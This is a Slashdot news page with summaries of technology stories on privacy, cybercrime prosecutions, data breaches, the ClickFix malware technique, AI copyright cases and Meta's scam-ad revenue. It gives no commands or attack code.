Google

Google Is Collecting Troves of Data From Downgraded Nest Thermostats 11

Even after disabling remote control and officially ending support for early Nest Learning Thermostats, Google is still receiving detailed sensor and activity data from these devices, including temperature changes, motion, and ambient light. The Verge reports: After digging into the backend, security researcher Cody Kociemba found that the first- and second-generation Nest Learning Thermostats are still sending Google information about manual temperature changes, whether a person is present in the room, if sunlight is hitting the device, and more. Kociemba made the discovery while participating in a bounty program created by FULU, a right-to-repair advocacy organization cofounded by electronics repair technician and YouTuber Louis Rossmann.

FULU challenged developers to come up with a solution to restore smart functionality to Nest devices no longer supported by Google, and that's exactly what Kociemba did with his open-source No Longer Evil project. But after cloning Google's API to create this custom software, he started receiving a trove of logs from customer devices, which he turned off. "On these devices, while they [Google] turned off access to remotely control them, they did leave in the ability for the devices to upload logs. And the logs are pretty extensive," Kociemba tells The Verge. [...] "I was under the impression that the Google connection would be severed along with the remote functionality, however that connection is not severed, and instead is a one-way street," Kociemba says.
The Courts

NetChoice Sues Virginia To Block Its One-Hour Social Media Limit For Kids (theverge.com) 30

NetChoice is suing Virginia to block a new law that limits kids under 16 to one hour of daily social media use unless parents approve more time, arguing the rule violates the First Amendment and introduces serious privacy risks through mandatory age-verification. The Verge reports: In addition to restricting access to legal speech, NetChoice alleges that Virginia's incoming law (SB 854) will require platforms to verify user ages in ways that would pose privacy and security risks. The law requires platforms to use "commercially reasonable methods," which it says include a screen that prompts the user to enter a birth date. However, NetChoice argues that Virginia could go beyond this requirement, citing a post from Governor Youngkin on X, stating "platforms must verify age," potentially referring to stricter methods, like having users submit a government ID or other personal information.

NetChoice, which is backed by tech giants like Meta, Google, Amazon, Reddit, and Discord, alleges that the law puts a burden on minors' ability to engage or consume speech online. "The First Amendment prohibits the government from placing these types of restrictions on accessing lawful and valuable speech, just in the same way that the government can't tell you how long you could spend reading a book, watching a television program, or consuming a documentary," Paul Taske, the co-director of the Netchoice Litigation Center, tells The Verge.

"Virginia must leave the parenting decisions where they belong: with parents," Taske says. "By asserting that authority for itself, Virginia not only violates its citizens' rights to free speech but also exposes them to increased risk of privacy and security breaches."

Crime

Google Begins Aggresively Using the Law To Stop Text Message Scams (bgr.com) 18

"Google is going to court to help put an end to, or at least limit, the prevalence of phishing scams over text message," reports BGR: Google said it's bringing suit against Lighthouse, an impressively large operation that allegedly provides tools customers can buy to set up their own specialized phishing scams. All told, Google estimates that Lighthouse-affiliated scams in the U.S. have stolen anywhere between 12.7 million and 115 million credit cards. "Bad actors built Lighthouse as a phishing-as-a-service kit to generate and deploy massive SMS phishing attacks," Google notes. "These attacks exploit established brands like E-Z Pass to steal people's financial information."

Google's legal action is comprehensive and is intent on completely dismantling Lighthouse's operations. The search giant is bringing claims under RICO, the Lanham Act, and the Computer Fraud and Abuse Act (CFAA). RICO, which often comes up in movies and television shows, allows authorities to treat Lighthouse's phishing operation as a broad criminal enterprise as opposed to isolated scams. By using RICO, Google also expands the list of individuals who can be found liable, whether it be the people who started Lighthouse, the people who run it, or even unaffiliated customers who used the company's services. The Lanham Act, for those unaware, targets malicious actors who misappropriate well-known company trademarks in order to confuse consumers. This Lanham Act comes into play because many phishing scams masquerade as legitimate messages from companies like Amazon and FedEx. The Computer Fraud and Abuse Act, meanwhile, is relevant because scammers typically use stolen credentials to gain unauthorized access to financial systems, something the CFAA is designed to target...

The fact that Google is invoking all three of the acts above underscores how serious the company is about putting a stop to SMS-based scams. By using all three, Google's legal attack is more potent and also expands the range of available remedies to include civil damages and criminal penalties. In short, Google isn't merely trying to win a legal case; it's aiming to emphatically and permanently stop Lighthouse in its tracks.

Getting even more aggressive, Google says it's also working with the U.S. Congress to pass new anti-scammer legislation, and endorsed these three new bipartisan bills:
  • The Scam Compound Accountability and Mobilization (SCAM) Act "would develop a national strategy to counter scam compounds, enhance sanctions and support survivors of human trafficking within these compounds."
  • The Foreign Robocall Elimination Act "would establish a taskforce focused on how to best block foreign-originated illegal robocalls before they ever reach American consumers."
  • The Guarding Unprotected Aging Retirees from Deception (GUARD) Act "would empower state and local law enforcement by enabling them to utilize federal grant funding to investigate financial fraud and scams specifically targeting retirees. "

Thanks to Slashdot reader anderzole for sharing the article.


ISS

Woman Pleads Guilty to Lying About Astronaut Accessing Bank Account From International Space Station (cnbc.com) 34

It was the first allegation of a crime committed in space — back in 2019. But by 2020 it had led to charges of lying to federal authorities. And now a former Air Force intelligence officer "has pleaded guilty to lying to a federal agent," reports CNBC, "by falsely claiming that her estranged astronaut wife illegally accessed her bank account while aboard the International Space Station for six months, prosecutors in Houston, Texas, said Friday." The guilty plea by Summer Worden, 50, on Thursday comes more than five years after she was indicted in the space case for lying about actions by her wife, Anne McClain, a U.S. Army colonel, West Point graduate and Iraq war combat veteran, while they were in the midst of a divorce. The claim came at a time when Worden said that the couple was engaged in a custody battle over what Worden's then-6-year-old son, who had been conceived through in vitro fertilizationand carried by a surrogate...

McClain was aboard the Space Station from December 2018 through June 2019. She recently commanded the SpaceX Crew-10 crew mission to the Space Station from March this year until August.

Worden, who remains free on bond, is scheduled to be sentenced on February 12. She faces a maximum possible sentence of up to five years in prison.

Crime

Five People Plead Quilty To Helping North Koreans Infiltrate US Companies (techcrunch.com) 31

"Within the past year, stories have been posted on Slashdot about people helping North Koreans get remote IT jobs at U.S. corporations, companies knowingly assisting them, how not to hire a North Korean for a remote IT job, and how a simple question tripped up a North Korean applying for a remote IT job," writes longtime Slashdot reader smooth wombat. "The FBI is even warning companies that North Koreans working remotely can steal source code and extort money from the company -- money that goes to fund the North Korean government. Now, five more people have plead guilty to knowingly helping North Koreans infiltrate U.S. companies as remote IT workers." TechCrunch reports: The five people are accused of working as "facilitators" who helped North Koreans get jobs by providing their own real identities, or false and stolen identities of more than a dozen U.S. nationals. The facilitators also hosted company-provided laptops in their homes across the U.S. to make it look like the North Korean workers lived locally, according to the DOJ press release. These actions affected 136 U.S. companies and netted Kim Jong Un's regime $2.2 million in revenue, said the DOJ. Three of the people -- U.S. nationals Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis -- each pleaded guilty to one count of wire fraud conspiracy.

Prosecutors accused the three of helping North Koreans posing as legitimate IT workers, whom they knew worked outside of the United States, to use their own identities to obtain employment, helped them remotely access their company-issued laptops set up in their homes, and also helped the North Koreans pass vetting procedures, such as drug tests. The fourth U.S. national who pleaded guilty is Erick Ntekereze Prince, who ran a company called Taggcar, which supplied to U.S. companies allegedly "certified" IT workers but whom he knew worked outside of the country and were using stolen or fake identities. Prince also hosted laptops with remote access software at several residences in Florida, and earned more than $89,000 for his work, the DOJ said.

Another participant in the scheme who pleaded guilty to one count of wire fraud conspiracy and another count of aggravated identity theft is Ukrainian national Oleksandr Didenko, who prosecutors accuse of stealing U.S. citizens' identities and selling them to North Koreans so they could get jobs at more than 40 U.S. companies. According to the press release, Didenko earned hundreds of thousands of dollars for this service. Didenko agreed to forfeit $1.4 million as part of his guilty plea. The DOJ also announced that it had frozen and seized more than $15 million in cryptocurrency stolen in 2023 by North Korean hackers from several crypto platforms.

Privacy

Logitech Reports Data Breach From Zero-Day Software Vulnerability (nerds.xyz) 5

BrianFagioli writes: Logitech has confirmed a cybersecurity breach after an intruder exploited a zero-day in a third-party software platform and copied internal data. The company says the incident did not affect its products, manufacturing or business operations, and it does not believe sensitive personal information like national ID numbers or credit card data were stored in the impacted system. The attacker still managed to pull limited information tied to employees, consumers, customers and suppliers, raising fair questions about how long the zero-day existed before being patched.

Logitech brought in outside cybersecurity firms, notified regulators and says the incident will not materially affect its financial results. The company expects its cybersecurity insurance policy to cover investigation costs and any potential legal or regulatory issues. Still, with zero-day attacks increasing across the tech world, even established hardware brands are being forced to acknowledge uncomfortable weaknesses in their internal systems.

Government

Singapore To Trial Tokenized Bills, Bring In Stablecoin Laws (reuters.com) 4

An anonymous reader quotes a report from Reuters: Singapore's central bank will hold trials to issue tokenized MAS bills next year and bring in laws to regulate stablecoins as it presses forward with plans to build a scalable and secure tokenised financial ecosystem, the bank's top official said on Thursday. "Tokenization has lifted off the ground. But have asset-backed tokens achieved escape velocity? Not yet," said Chia Der Jiun, Managing Director of the Monetary Authority of Singapore (MAS), a keynote address at the Singapore FinTech Festival.

He said MAS has been working on the details of its stablecoin regulatory regime and will prepare draft legislation, with the emphasis on "sound reserve backing and redemption reliability." MAS is also supporting trials under the BLOOM initiative, which explores the use of tokenized bank liabilities and regulated stablecoins for settlement, he added. "In the CBDC space, I am pleased to announce that the three Singapore banks, DBS, OCBC, and UOB, have successfully conducted interbank overnight lending transactions using the first live trial issuance of Singapore dollar wholesale CBDC," he said. MAS will expand trials to include tokenized MAS bills settled with CBDC, he added.

Privacy

Hyundai Data Breach May Have Leaked Drivers' Personal Information (caranddriver.com) 54

According to Car and Driver, Hyundai has suffered a data breach that leaked the personal data of up to 2.7 million customers. The leak reportedly took place in February from Hyundai AutoEver, the company's IT affiliate. It includes customer names, driver's license numbers, and social security numbers. Longtime Slashdot reader sinij writes: Thanks to tracking modules plaguing most modern cars, that data likely includes the times and locations of customers' vehicles. These repeated breaches make it clear that, unlike smartphone manufacturers that are inherently tech companies, car manufacturers collecting your data are going to keep getting breached and leaking it.
Privacy

Proton Might Recycle Abandoned Email Addresses (nerds.xyz) 30

BrianFagioli writes: Popular privacy firm Proton is floating a plan on Reddit that should unsettle anyone who values privacy, writes Nerds.xyz. The company is considering recycling abandoned email addresses that were originally created by bots a decade ago. These addresses were never used, yet many of them are extremely common names that have silently collected misdirected emails, password reset attempts, and even entries in breach datasets. Handing those addresses to new owners today would mean that sensitive messages intended for completely different people could start landing in a stranger's inbox overnight.

Proton says it's just gathering feedback, but the fact that this made it far enough to ask the community is troubling. Releasing these long-abandoned addresses would create confusion, risk exposure of personal data, and undermine the trust users place in a privacy focused provider. It's hard to see how Proton could justify taking a gamble with other people's digital identities like this.

The Courts

OpenAI Fights Order To Turn Over Millions of ChatGPT Conversations (reuters.com) 69

An anonymous reader quotes a report from Reuters: OpenAI asked a federal judge in New York on Wednesday to reverse an order that required it to turn over 20 million anonymized ChatGPT chat logs amid a copyright infringement lawsuit by the New York Times and other news outlets, saying it would expose users' private conversations. The artificial intelligence company argued that turning over the logs would disclose confidential user information and that "99.99%" of the transcripts have nothing to do with the copyright infringement allegations in the case.

"To be clear: anyone in the world who has used ChatGPT in the past three years must now face the possibility that their personal conversations will be handed over to The Times to sift through at will in a speculative fishing expedition," the company said in a court filing (PDF). The news outlets argued that the logs were necessary to determine whether ChatGPT reproduced their copyrighted content and to rebut OpenAI's assertion that they "hacked" the chatbot's responses to manufacture evidence. The lawsuit claims OpenAI misused their articles to train ChatGPT to respond to user prompts.

Magistrate Judge Ona Wang said in her order to produce the chats that users' privacy would be protected by the company's "exhaustive de-identification" and other safeguards. OpenAI has a Friday deadline to produce the transcripts.

Piracy

Amazon Steps Up Attempts To Block Illegal Sports Streaming Via Fire TV Sticks (nytimes.com) 27

Amazon is rolling out a tougher approach to combat illegal streaming, with the United States-based tech company aiming to block apps loaded onto all its Fire TV Stick devices that are identified as providing pirated content. From a report: Exclusive data provided to The Athletic from researchers YouGov Sport highlighted that approximately 4.7 million UK adults watched illegal streams in the UK over the past six months, with 31% using Fire Stick (this has become a catch-all term for plug-in devices, even if not made by Amazon) and other IPTV (Internet Protocol Television) devices. It is now the second-most popular method behind websites (42%).

Amazon launched a new Fire TV Stick last month -- the 4K Select, which is plugged into a TV to facilitate streaming via the internet -- that it insists will be less of a breeding ground for piracy. It comprises enhanced security measures -- via a new Vega operating system -- and only apps available in Amazon's app store will be available for customers to download. Amazon insists the clampdown will apply to the new and old devices, but registered developers will still be able to use Fire Sticks for legitimate purposes.

Security

ClickFix May Be the Biggest Security Threat Your Family Has Never Heard Of (arstechnica.com) 79

An anonymous reader quotes a report from Ars Technica: ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter. Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it -- all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious. The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users' minds, the precaution doesn't extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard. With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.
Researchers from CrowdStrike described in a report a campaign designed to infect Macs with a Mach-O executive. "Promoting false malicious websites encourages more site traffic, which will lead to more potential victims," wrote the researchers. "The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim's machine while bypassing Gatekeeper checks."

Push Security, meanwhile, reported a ClickFix campaign that uses a device-adaptive page that serves different malicious payloads depending on whether the visitor is on Windows or macOS.
The Courts

OpenAI Used Song Lyrics In Violation of Copyright Laws, German Court Says (reuters.com) 66

A Munich court ruled that OpenAI violated German copyright law by training its models on lyrics from nine songs and allowing ChatGPT to reproduce them. OpenAI now faces damages as it considers an appeal. Reuters reports: The regional court in Munich found that the company trained its AI on protected content from nine German songs, including Groenemeyer's hits "Maenner" and "Bochum." The case was brought by German music rights society GEMA, whose members include composers, lyricists and publishers, in another sign of artists around the world fighting back against data scraping by AI.

Presiding judge Elke Schwager ordered OpenAI to pay damages for the use of copyrighted material, without disclosing a figure. GEMA legal advisor Kai Welp said GEMA hoped discussions could now take place with OpenAI on how copyright holders can be remunerated. OpenAI had argued that its language models did not store or copy specific training data but, rather, reflected what they had learned based on the entire training data set.

Since the output would only be generated as a result of user inputs known as prompts, it was not the defendants, but the respective user who would be liable for it, OpenAI had argued. However, the court found that both the memorization in the language models and the reproduction of the song lyrics in the chatbot's outputs constitute infringements of copyright exploitation rights, according to a statement on the ruling.

United States

US Senator Challenges Defense Industry on Right-to-Repair Opposition (reuters.com) 47

Democratic U.S. Senator Elizabeth Warren is escalating pressure on the defense industry to stop opposing military right-to-repair legislation, as House and Senate negotiators work to finalize the fiscal 2026 National Defense Authorization Act. From a report: In a sharply-worded November 5 letter to the National Defense Industrial Association (NDIA) obtained by Reuters, Warren accused the industry group of attempting to undermine bipartisan efforts to give the Pentagon greater ability to repair weapons and equipment it owns.

She called the group's opposition "a dangerous and misguided attempt to protect an unacceptable status quo of giant contractor profiteering." Currently, the government is often required to pay contractors like NDIA members Lockheed Martin, Boeing and RTX to use expensive original equipment and installers to service broken parts, versus having trained military maintainers 3D print spares in the field and install them faster and more cheaply.

Security

A Jailed Hacking Kingpin Reveals All About Cybercrime Gang (bbc.com) 19

Slashdot reader alternative_right shares an exclusive BBC interview with Vyacheslav "Tank" Penchukov, once a top-tier cyber-crime boss behind Jabber Zeus, IcedID, and major ransomware campaigns. His story traces the evolution of modern cybercrime from early bank-theft malware to today's lucrative ransomware ecosystem, marked by shifting alliances, Russian security-service ties, and the paranoia that ultimately consumes career hackers. Here's an excerpt from the report: In the late 2000s, he and the infamous Jabber Zeus crew used revolutionary cyber-crime tech to steal directly from the bank accounts of small businesses, local authorities and even charities. Victims saw their savings wiped out and balance sheets upended. In the UK alone, there were more than 600 victims, who lost more than $5.2 million in just three months. Between 2018 and 2022, Penchukov set his sights higher, joining the thriving ransomware ecosystem with gangs that targeted international corporations and even a hospital. [...]

Penchukov says he did not think about the victims, and he does not seem to do so much now, either. The only sign of remorse in our conversation was when he talked about a ransomware attack on a disabled children's charity. His only real regret seems to be that he became too trusting with his fellow hackers, which ultimately led to him and many other criminals being caught. "You can't make friends in cyber-crime, because the next day, your friends will be arrested and they will become an informant," he says. "Paranoia is a constant friend of hackers," he says. But success leads to mistakes. "If you do cyber-crime long enough you lose your edge," he says, wistfully.

EU

Critics Call Proposed Changes To Landmark EU Privacy Law 'Death By a Thousand Cuts' (reuters.com) 27

An anonymous reader quotes a report from Reuters: Privacy activists say proposed changes to Europe's landmark privacy law, including making it easier for Big Tech to harvest Europeans' personal data for AI training, would flout EU case law and gut the legislation. The changes proposed by the European Commission are part of a drive to simplify a slew of laws adopted in recent years on technology, environmental and financial issues which have in turn faced pushback from companies and the U.S. government.

EU antitrust chief Henna Virkkunen will present the Digital Omnibus, in effect proposals to cut red tape and overlapping legislation such as the General Data Protection Regulation, the Artificial Intelligence Act, the e-Privacy Directive and the Data Act, on November 19. According to the plans, Google, Meta Platforms, OpenAI and other tech companies may be allowed to use Europeans' personal data to train their AI models based on legitimate interest.

In addition, companies may be exempted from the ban on processing special categories of personal data "in order not to disproportionately hinder the development and operation of AI and taking into account the capabilities of the controller to identify and remove special categories of personal data." [...] The proposals would need to be thrashed out with EU countries and European Parliament in the coming months before they can be implemented.
"The draft Digital Omnibus proposes countless changes to many different articles of the GDPR. In combination this amounts to a death by a thousand cuts," Austrian privacy group noyb said in a statement. "This would be a massive downgrading of Europeans' privacy 10 years after the GDPR was adopted," noyb's Max Schrems said.

"These proposals would change how the EU protects what happens inside your phone, computer and connected devices," European Digital Rights policy advisor Itxaso Dominguez de Olazabal wrote in a LinkedIn post. "That means access to your device could rely on legitimate interest or broad exemptions like security, fraud detection or audience measurement," she said.
AI

'AI Slop' in Court Filings: Lawyers Keep Citing Fake AI-Hallucinated Cases (indianexpress.com) 135

"According to court filings and interviews with lawyers and scholars, the legal profession in recent months has increasingly become a hotbed for AI blunders," reports the New York Times: Earlier this year, a lawyer filed a motion in a Texas bankruptcy court that cited a 1985 case called Brasher v. Stewart. Only the case doesn't exist. Artificial intelligence had concocted that citation, along with 31 others. A judge blasted the lawyer in an opinion, referring him to the state bar's disciplinary committee and mandating six hours of A.I. training.

That filing was spotted by Robert Freund, a Los Angeles-based lawyer, who fed it to an online database that tracks legal A.I. misuse globally. Mr. Freund is part of a growing network of lawyers who track down A.I. abuses committed by their peers, collecting the most egregious examples and posting them online. The group hopes that by tracking down the A.I. slop, it can help draw attention to the problem and put an end to it... [C]ourts are starting to map out punishments of small fines and other discipline. The problem, though, keeps getting worse. That's why Damien Charlotin, a lawyer and researcher in France, started an online database in April to track it.

Initially he found three or four examples a month. Now he often receives that many in a day. Many lawyers... have helped him document 509 cases so far. They use legal tools like LexisNexis for notifications on keywords like "artificial intelligence," "fabricated cases" and "nonexistent cases." Some of the filings include fake quotes from real cases, or cite real cases that are irrelevant to their arguments. The legal vigilantes uncover them by finding judges' opinions scolding lawyers...

Court-ordered penalties "are not having a deterrent effect," said Freund, who has publicly flagged more than four dozen examples this year. "The proof is that it continues to happen."

Google

Did ChatGPT Conversations Leak... Into Google Search Console Results? (arstechnica.com) 51

"For months, extremely personal and sensitive ChatGPT conversations have been leaking into an unexpected destination," reports Ars Technica: the search-traffic tool for webmasters , Google Search Console.

Though it normally shows the short phrases or keywords typed into Google which led someone to their site, "starting this September, odd queries, sometimes more than 300 characters long, could also be found" in Google Search Console. And the chats "appeared to be from unwitting people prompting a chatbot to help solve relationship or business problems, who likely expected those conversations would remain private." Jason Packer, owner of analytics consulting firm Quantable, flagged the issue in a detailed blog post last month, telling Ars Technica he'd seen 200 odd queries — including "some pretty crazy ones." (Web optimization consultant Slobodan ManiÄ helped Packer investigate...) Packer points out "nobody clicked share" or were given an option to prevent their chats from being exposed. Packer suspected that these queries were connected to reporting from The Information in August that cited sources claiming OpenAI was scraping Google search results to power ChatGPT responses. Sources claimed that OpenAI was leaning on Google to answer prompts to ChatGPT seeking information about current events, like news or sports... "Did OpenAI go so fast that they didn't consider the privacy implications of this, or did they just not care?" Packer posited in his blog... Clearly some of those searches relied on Google, Packer's blog said, mistakenly sending to GSC "whatever" the user says in the prompt box... This means "that OpenAI is sharing any prompt that requires a Google Search with both Google and whoever is doing their scraping," Packer alleged. "And then also with whoever's site shows up in the search results! Yikes."

To Packer, it appeared that "ALL ChatGPT prompts" that used Google Search risked being leaked during the past two months. OpenAI claimed only a small number of queries were leaked but declined to provide a more precise estimate. So, it remains unclear how many of the 700 million people who use ChatGPT each week had prompts routed to Google Search Console.

"Perhaps most troubling to some users — whose identities are not linked in chats unless their prompts perhaps share identifying information — there does not seem to be any way to remove the leaked chats from Google Search Console.."
Facebook

Bombshell Report Exposes How Meta Relied On Scam Ad Profits To Fund AI (reuters.com) 59

"Internal documents have revealed that Meta has projected it earns billions from ignoring scam ads that its platforms then targeted to users most likely to click on them," writes Ars Technica, citing a lengthy report from Reuters.

Reuters reports that Meta "for at least three years failed to identify and stop an avalanche of ads that exposed Facebook, Instagram and WhatsApp's billions of users to fraudulent e-commerce and investment schemes, illegal online casinos, and the sale of banned medical products..." On average, one December 2024 document notes, the company shows its platforms' users an estimated 15 billion "higher risk" scam advertisements — those that show clear signs of being fraudulent — every day. Meta earns about $7 billion in annualized revenue from this category of scam ads each year, another late 2024 document states. Much of the fraud came from marketers acting suspiciously enough to be flagged by Meta's internal warning systems.

But the company only bans advertisers if its automated systems predict the marketers are at least 95% certain to be committing fraud, the documents show. If the company is less certain — but still believes the advertiser is a likely scammer — Meta charges higher ad rates as a penalty, according to the documents. The idea is to dissuade suspect advertisers from placing ads. The documents further note that users who click on scam ads are likely to see more of them because of Meta's ad-personalization system, which tries to deliver ads based on a user's interests... The documents indicate that Meta's own research suggests its products have become a pillar of the global fraud economy. A May 2025 presentation by its safety staff estimated that the company's platforms were involved in a third of all successful scams in the U.S.

Meta also acknowledged in other internal documents that some of its main competitors were doing a better job at weeding out fraud on their platforms... The documents note that Meta plans to try to cut the share of Facebook and Instagram revenue derived from scam ads. In the meantime, Meta has internally acknowledged that regulatory fines for scam ads are certain, and anticipates penalties of up to $1 billion, according to one internal document. But those fines would be much smaller than Meta's revenue from scam ads, a separate document from November 2024 states. Every six months, Meta earns $3.5 billion from just the portion of scam ads that "present higher legal risk," the document says, such as those falsely claiming to represent a consumer brand or public figure or demonstrating other signs of deceit. That figure almost certainly exceeds "the cost of any regulatory settlement involving scam ads...."

A planning document for the first half of 2023 notes that everyone who worked on the team handling advertiser concerns about brand-rights issues had been laid off. The company was also devoting resources so heavily to virtual reality and AI that safety staffers were ordered to restrict their use of Meta's computing resources. They were instructed merely to "keep the lights on...." Meta also was ignoring the vast majority of user reports of scams, a document from 2023 indicates. By that year, safety staffers estimated that Facebook and Instagram users each week were filing about 100,000 valid reports of fraudsters messaging them, the document says. But Meta ignored or incorrectly rejected 96% of them. Meta's safety staff resolved to do better. In the future, the company hoped to dismiss no more than 75% of valid scam reports, according to another 2023 document.

A small advertiser would have to get flagged for promoting financial fraud at least eight times before Meta blocked it, a 2024 document states. Some bigger spenders — known as "High Value Accounts" — could accrue more than 500 strikes without Meta shutting them down, other documents say.

Thanks to long-time Slashdot reader schwit1 for sharing the article.
Privacy

Unesco Adopts Global Standards On 'Wild West' Field of Neurotechnology (theguardian.com) 14

Unesco has adopted the first global ethical standards for neurotechnology, defining "neural data" and outlining more than 100 recommendations aimed at safeguarding mental privacy. "There is no control," said Unesco's chief of bioethics, Dafna Feinholz. "We have to inform the people about the risks, the potential benefits, the alternatives, so that people have the possibility to say 'I accept, or I don't accept.'" The Guardian reports: She said the new standards were driven by two recent developments in neurotechnology: artificial intelligence (AI), which offers vast possibilities in decoding brain data, and the proliferation of consumer-grade neurotech devices such as earbuds that claim to read brain activity and glasses that track eye movements.

The standards define a new category of data, "neural data," and suggest guidelines governing its protection. A list of more than 100 recommendations ranges from rights-based concerns to addressing scenarios that are -- at least for now -- science fiction, such as companies using neurotechnology to subliminally market to people during their dreams.
"Neurotechnology has the potential to define the next frontier of human progress, but it is not without risks," said Unesco's director general, Audrey Azoulay. The new standards would "enshrine the inviolability of the human mind," she said.

Slashdot Top Deals